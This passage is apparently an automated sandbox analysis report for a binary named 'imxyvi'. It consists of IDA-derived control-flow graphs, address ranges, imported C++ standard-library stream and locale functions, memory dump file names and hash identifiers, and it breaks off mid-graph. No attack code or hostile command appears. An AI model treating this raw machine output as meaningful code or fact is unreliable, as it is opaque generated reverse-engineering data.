                                                                                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@U?$char_traits@_W@std@@@std@@$Init@?$basic_streambuf@_$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?getloc@?$basic_streambuf@_?setstate@?$basic_ios@?tolower@?$ctype@Bid@locale@std@@D@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 83113347-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 23c5f14d9d2920ffdb8e200f91ecf5db91b09fde0a9e379cc2496c2f3c31cd4e
                                                                                                                                                                                                                                                                                      • Instruction ID: 8005482107a74d1a2f7256f8ad74eca435312051989eda29de2ccf896b0215cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23c5f14d9d2920ffdb8e200f91ecf5db91b09fde0a9e379cc2496c2f3c31cd4e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8251093260AB8586EB50CF66E85136EB7A4FB89F88F644035DA8E83B24DF3CD455C740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Locinfo@std@@$??0_??1_Lockit@std@@_invalid_parameter_noinfo_noreturn$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Registermallocstd::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1534690320-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 169031d74469e112c6efba4f64582ef27abecf866ba2d89cf39a52c7bb9dfa0b
                                                                                                                                                                                                                                                                                      • Instruction ID: a76a52166c454b7abd8c9316f22e7f813e86735e3a3d9079e65e0dfb3bf51cf1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 169031d74469e112c6efba4f64582ef27abecf866ba2d89cf39a52c7bb9dfa0b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F415F32A0AA4181EA159F36E5653AEB3A1FB88BE0F254232DA5DD3764DF3CD485C700

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6A952F5FE
                                                                                                                                                                                                                                                                                      • ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAA@PEAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP140 ref: 00007FF6A952F61D
                                                                                                                                                                                                                                                                                      • ??0?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6A952F64F
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F66A
                                                                                                                                                                                                                                                                                      • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6A952F694
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F6B1
                                                                                                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6A952F6D5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6A953013D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6A9530157
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6A9530189
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: ?_Getcat@?$codecvt@_WDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6A95301B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: std::_Facet_Register.LIBCPMT ref: 00007FF6A95301CD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530110: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6A95301EC
                                                                                                                                                                                                                                                                                      • ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD@Z.MSVCP140 ref: 00007FF6A952F6EA
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F701
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6A952F743
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: U?$char_traits@_$W@std@@@std@@$Init@?$basic_streambuf@_$Lockit@std@@$??0?$basic_ios@_??0?$basic_ostream@_??0?$basic_streambuf@_??0_??1_?getloc@?$basic_streambuf@_?setstate@?$basic_ios@?tolower@?$ctype@Bid@locale@std@@D@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@_Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@V?$basic_streambuf@_Vfacet@locale@2@Vlocale@2@W@std@@@1@_std::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2364978435-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9c04b9d044b37bafc3c51e5e7a014765b17a55fa6c84eb2a6b0a163aa1681188
                                                                                                                                                                                                                                                                                      • Instruction ID: 5055cc63d090f439f2761d764632fe1eaf59644ccd3a91a585edd5d3df820aee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c04b9d044b37bafc3c51e5e7a014765b17a55fa6c84eb2a6b0a163aa1681188
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22414D3260AB4186EB04CF76E46536977A4FB49F89F288035CA4E83724DF3CD419C740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 6886 7ff6a9530400-7ff6a953042f 6887 7ff6a9530430-7ff6a9530438 6886->6887 6887->6887 6888 7ff6a953043a-7ff6a9530449 6887->6888 6889 7ff6a953044b-7ff6a953044e 6888->6889 6890 7ff6a9530455 6888->6890 6889->6890 6891 7ff6a9530450-7ff6a9530453 6889->6891 6892 7ff6a9530457-7ff6a9530467 6890->6892 6891->6892 6893 7ff6a9530469-7ff6a953046f 6892->6893 6894 7ff6a9530470-7ff6a9530482 ?good@ios_base@std@@QEBA_NXZ 6892->6894 6893->6894 6895 7ff6a95304b4-7ff6a95304ba 6894->6895 6896 7ff6a9530484-7ff6a9530493 6894->6896 6897 7ff6a95304c6-7ff6a95304df 6895->6897 6898 7ff6a95304bc-7ff6a95304c1 6895->6898 6900 7ff6a9530495-7ff6a9530498 6896->6900 6901 7ff6a95304b2 6896->6901 6903 7ff6a95304e1-7ff6a95304e4 6897->6903 6904 7ff6a953050f-7ff6a953052a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 6897->6904 6902 7ff6a953057e-7ff6a953059c ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 6898->6902 6900->6901 6905 7ff6a953049a-7ff6a95304b0 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 6900->6905 6901->6895 6906 7ff6a95305a8-7ff6a95305b8 6902->6906 6907 7ff6a953059e-7ff6a95305a7 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 6902->6907 6903->6904 6908 7ff6a95304e6-7ff6a9530501 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 6903->6908 6909 7ff6a9530557 6904->6909 6910 7ff6a953052c 6904->6910 6905->6895 6911 7ff6a95305ba-7ff6a95305c0 6906->6911 6912 7ff6a95305c1-7ff6a95305db 6906->6912 6907->6906 6913 7ff6a953050a-7ff6a953050d 6908->6913 6914 7ff6a9530503-7ff6a9530508 6908->6914 6916 7ff6a953055a 6909->6916 6915 7ff6a9530530-7ff6a9530533 6910->6915 6911->6912 6913->6903 6914->6916 6917 7ff6a953055e-7ff6a953056e 6915->6917 6918 7ff6a9530535-7ff6a9530550 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 6915->6918 6916->6917 6917->6902 6918->6909 6920 7ff6a9530552-7ff6a9530555 6918->6920 6920->6915
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6A953047A
                                                                                                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6A953049A
                                                                                                                                                                                                                                                                                      • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6A95304AA
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6A95304F7
                                                                                                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6A9530521
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6A9530546
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6A953058D
                                                                                                                                                                                                                                                                                      • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6A9530594
                                                                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6A95305A1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@_U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1082411713-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 45054d7cc04613a0964733ee300a69212865a64964a28420a2abc5d095f187e7
                                                                                                                                                                                                                                                                                      • Instruction ID: e20c949f09689a48e27ca81fea30e1ad66b3ca9b8a7a20d137e9474a23dce4b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45054d7cc04613a0964733ee300a69212865a64964a28420a2abc5d095f187e7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851E322606B4182EB608F3AE5A123AE7E0FB45F95B25C531DE5EC3BA4CF7DD5468300

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 6921 7ff6a9530890-7ff6a9530899 6922 7ff6a953089b 6921->6922 6923 7ff6a953089e-7ff6a9531e34 6921->6923 6922->6923 6925 7ff6a9531e36-7ff6a9531e39 6923->6925 6926 7ff6a9531e40 6923->6926 6925->6926 6927 7ff6a9531e3b-7ff6a9531e3e 6925->6927 6928 7ff6a9531e42-7ff6a9531e52 6926->6928 6927->6928 6929 7ff6a9531e5b-7ff6a9531e6d ?good@ios_base@std@@QEBA_NXZ 6928->6929 6930 7ff6a9531e54-7ff6a9531e5a 6928->6930 6931 7ff6a9531e9f-7ff6a9531ea5 6929->6931 6932 7ff6a9531e6f-7ff6a9531e7e 6929->6932 6930->6929 6935 7ff6a9531ea7-7ff6a9531eac 6931->6935 6936 7ff6a9531eb1-7ff6a9531ec4 6931->6936 6933 7ff6a9531e9d 6932->6933 6934 7ff6a9531e80-7ff6a9531e83 6932->6934 6933->6931 6934->6933 6938 7ff6a9531e85-7ff6a9531e9b ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 6934->6938 6939 7ff6a9531f61-7ff6a9531f7f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 6935->6939 6940 7ff6a9531ec6-7ff6a9531ec9 6936->6940 6941 7ff6a9531ef7-7ff6a9531f12 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 6936->6941 6938->6931 6942 7ff6a9531f8b-7ff6a9531f9a 6939->6942 6943 7ff6a9531f81-7ff6a9531f8a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 6939->6943 6940->6941 6944 7ff6a9531ecb-7ff6a9531ee5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 6940->6944 6945 7ff6a9531f3a-7ff6a9531f3d 6941->6945 6946 7ff6a9531f14-7ff6a9531f17 6941->6946 6948 7ff6a9531f9c-7ff6a9531fa2 6942->6948 6949 7ff6a9531fa3-7ff6a9531fb7 6942->6949 6943->6942 6950 7ff6a9531ee7-7ff6a9531ef0 6944->6950 6951 7ff6a9531ef2-7ff6a9531ef5 6944->6951 6947 7ff6a9531f41-7ff6a9531f51 6945->6947 6946->6947 6952 7ff6a9531f19-7ff6a9531f33 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 6946->6952 6947->6939 6948->6949 6950->6946 6951->6940 6952->6945 6953 7ff6a9531f35-7ff6a9531f38 6952->6953 6953->6946
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 929054647-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bb604f6eba23b001b1e28e65976775950ed75e85366b51f5158e4ac13b8c968f
                                                                                                                                                                                                                                                                                      • Instruction ID: fd250349a3e601849f41ad431fb2888ce4b8384b47039a1924900893ee50fc92
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb604f6eba23b001b1e28e65976775950ed75e85366b51f5158e4ac13b8c968f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB510132A09A4182EB609F3AD5E163AEBA0FF85F95B258531DE5EC7760CF3DD4469300

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 6955 7ff6a9531c30-7ff6a9531c6a 6956 7ff6a9531c76 6955->6956 6957 7ff6a9531c6c-7ff6a9531c6f 6955->6957 6959 7ff6a9531c78-7ff6a9531c88 6956->6959 6957->6956 6958 7ff6a9531c71-7ff6a9531c74 6957->6958 6958->6959 6960 7ff6a9531c8a-7ff6a9531c90 6959->6960 6961 7ff6a9531c91-7ff6a9531ca3 ?good@ios_base@std@@QEBA_NXZ 6959->6961 6960->6961 6962 7ff6a9531cd5-7ff6a9531cdb 6961->6962 6963 7ff6a9531ca5-7ff6a9531cb4 6961->6963 6967 7ff6a9531ce7-7ff6a9531d00 6962->6967 6968 7ff6a9531cdd-7ff6a9531ce2 6962->6968 6965 7ff6a9531cb6-7ff6a9531cb9 6963->6965 6966 7ff6a9531cd3 6963->6966 6965->6966 6972 7ff6a9531cbb-7ff6a9531cd1 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 6965->6972 6966->6962 6970 7ff6a9531d34-7ff6a9531d4f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 6967->6970 6971 7ff6a9531d02-7ff6a9531d05 6967->6971 6969 7ff6a9531d9f-7ff6a9531dbd ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 6968->6969 6976 7ff6a9531dc9-7ff6a9531dd8 6969->6976 6977 7ff6a9531dbf-7ff6a9531dc8 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 6969->6977 6974 7ff6a9531d78-7ff6a9531d7b 6970->6974 6975 7ff6a9531d51-7ff6a9531d54 6970->6975 6971->6970 6973 7ff6a9531d07-7ff6a9531d22 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 6971->6973 6972->6962 6978 7ff6a9531d2f-7ff6a9531d32 6973->6978 6979 7ff6a9531d24-7ff6a9531d2d 6973->6979 6981 7ff6a9531d7f-7ff6a9531d8f 6974->6981 6980 7ff6a9531d56-7ff6a9531d71 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 6975->6980 6975->6981 6982 7ff6a9531dda-7ff6a9531de0 6976->6982 6983 7ff6a9531de1-7ff6a9531dfb 6976->6983 6977->6976 6978->6971 6979->6975 6980->6974 6984 7ff6a9531d73-7ff6a9531d76 6980->6984 6981->6969 6982->6983 6984->6975
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6A9531C9B
                                                                                                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6A9531CBB
                                                                                                                                                                                                                                                                                      • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6A9531CCB
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6A9531D18
                                                                                                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6A9531D46
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF6A9531D67
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6A9531DAE
                                                                                                                                                                                                                                                                                      • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6A9531DB5
                                                                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6A9531DC2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@_U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1082411713-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d5ec328a8f88ad9dde88304c696be7adf3c733013d7e46863af4980d22f23f1
                                                                                                                                                                                                                                                                                      • Instruction ID: a8488815adf55d386a47c53589388d112336c19dc324e3d3137eeee7167b3bcc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5ec328a8f88ad9dde88304c696be7adf3c733013d7e46863af4980d22f23f1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F051F332A09A4582EB208F3AD5E163AE7A0FF45F95B258931DE4EC7764CF3DD4468740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 6997 7ff6a952f760-7ff6a952f7cc 6998 7ff6a952f7ce 6997->6998 6999 7ff6a952f7d2-7ff6a952f7ec 6997->6999 6998->6999 7000 7ff6a952fadb-7ff6a952faf1 6999->7000 7001 7ff6a952f7f2-7ff6a952f7f6 6999->7001 7002 7ff6a952faf7-7ff6a952fb05 7000->7002 7003 7ff6a952fa1f-7ff6a952fa41 call 7ff6a953a940 7000->7003 7004 7ff6a952f800-7ff6a952f844 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z 7001->7004 7006 7ff6a952fa1a call 7ff6a953a960 7002->7006 7007 7ff6a952fb0b-7ff6a952fb1e 7002->7007 7008 7ff6a952f846-7ff6a952f849 7004->7008 7009 7ff6a952f8b1-7ff6a952f8b8 7004->7009 7006->7003 7007->7006 7012 7ff6a952fb24-7ff6a952fb2a _invalid_parameter_noinfo_noreturn 7007->7012 7008->7009 7015 7ff6a952f84b-7ff6a952f84e 7008->7015 7013 7ff6a952f917-7ff6a952f91f 7009->7013 7014 7ff6a952f8ba-7ff6a952f8ca 7009->7014 7016 7ff6a952fb2b-7ff6a952fb30 call 7ff6a9511980 7012->7016 7019 7ff6a952f925-7ff6a952f933 7013->7019 7020 7ff6a952fa42-7ff6a952fa47 7013->7020 7017 7ff6a952f8cc-7ff6a952f8fb memcpy 7014->7017 7018 7ff6a952f8fd-7ff6a952f915 call 7ff6a9531060 7014->7018 7021 7ff6a952f854-7ff6a952f85b 7015->7021 7022 7ff6a952f993-7ff6a952f998 7015->7022 7025 7ff6a952fb31-7ff6a952fb56 call 7ff6a9511980 7016->7025 7029 7ff6a952f967 7017->7029 7018->7029 7031 7ff6a952f956-7ff6a952f962 call 7ff6a95316b0 7019->7031 7032 7ff6a952f935-7ff6a952f954 7019->7032 7020->7016 7027 7ff6a952fa4d-7ff6a952fa5e call 7ff6a952eac0 7020->7027 7023 7ff6a952f96b-7ff6a952f984 7021->7023 7024 7ff6a952f861-7ff6a952f86c 7021->7024 7022->7025 7026 7ff6a952f99e-7ff6a952f9af call 7ff6a952eac0 7022->7026 7023->7000 7036 7ff6a952f98a-7ff6a952f98e 7023->7036 7034 7ff6a952f88e-7ff6a952f892 call 7ff6a9531540 7024->7034 7035 7ff6a952f86e-7ff6a952f88c 7024->7035 7052 7ff6a952fb58-7ff6a952fb5e 7025->7052 7053 7ff6a952fb5f-7ff6a952fb63 7025->7053 7048 7ff6a952f9b1-7ff6a952f9c3 7026->7048 7049 7ff6a952f9e4-7ff6a952f9ec 7026->7049 7050 7ff6a952fa96-7ff6a952fa9e 7027->7050 7051 7ff6a952fa60-7ff6a952fa72 7027->7051 7029->7023 7031->7029 7032->7029 7042 7ff6a952f897-7ff6a952f8aa 7034->7042 7035->7042 7036->7004 7042->7024 7047 7ff6a952f8ac 7042->7047 7047->7023 7055 7ff6a952f9de-7ff6a952f9e3 call 7ff6a953a960 7048->7055 7056 7ff6a952f9c5-7ff6a952f9d8 7048->7056 7049->7003 7059 7ff6a952f9ee-7ff6a952f9ff 7049->7059 7050->7003 7054 7ff6a952faa4-7ff6a952fab5 7050->7054 7057 7ff6a952fa90-7ff6a952fa95 call 7ff6a953a960 7051->7057 7058 7ff6a952fa74-7ff6a952fa87 7051->7058 7052->7053 7054->7006 7060 7ff6a952fabb-7ff6a952face 7054->7060 7055->7049 7056->7055 7061 7ff6a952fa89-7ff6a952fa8f _invalid_parameter_noinfo_noreturn 7056->7061 7057->7050 7058->7057 7058->7061 7059->7006 7064 